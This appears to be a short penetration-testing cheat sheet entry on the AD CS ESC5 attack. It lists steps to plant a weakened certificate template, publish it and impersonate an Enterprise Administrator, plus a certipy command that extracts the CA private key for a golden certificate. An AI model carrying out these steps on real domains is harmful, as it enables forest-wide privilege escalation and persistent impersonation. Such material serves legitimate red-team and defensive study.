Active Directory - Certificate ESC5
ESC5 - Vulnerable PKI Object Access Control
Escalate the privileges from Domain Administrator in the child domain into Enterprise Administrator at the forest root.
Requirements:
- Add new templates to the "Certificate" Templates container
- "WRITE" access to the
pKIEnrollmentService
object
Exploitation - Access Control:
- Use
PsExec
to launchmmc
as SYSTEM on the child DC:psexec.exe /accepteula -i -s mmc
- Connect to "Configuration naming context" > "Certificate Template" container
- Open
certsrv.msc
as SYSTEM and duplicate an existing template - Edit the properties of the template to:
- Granting enroll rights to a principal we control in the child domain.
- Including Client Authentication in the Application Policies.
- Allowing SANs in certificate requests.
- Not enabling manager approval or authorized signatures.
- Publish the certificate template to the CA
- Publish by adding the template to the list in
certificateTemplate
property ofCN=Services
>CN=Public Key Services
>CN=Enrollment Services
>pkiEnrollmentService
- Publish by adding the template to the list in
- Finally use the ESC1 vulnerability introduced in the duplicated template to issue a certificate impersonating an Enterprise Administrator.
Exploitation - Golden Certificate:
Use certipy
to extract the CA certificate and private key
certipy ca -backup -u user@domain.local -p password -dc-ip 10.10.10.10 -ca 'DOMAIN-CA' -target 10.10.10.11 -debug
Then forge a domain admin certificate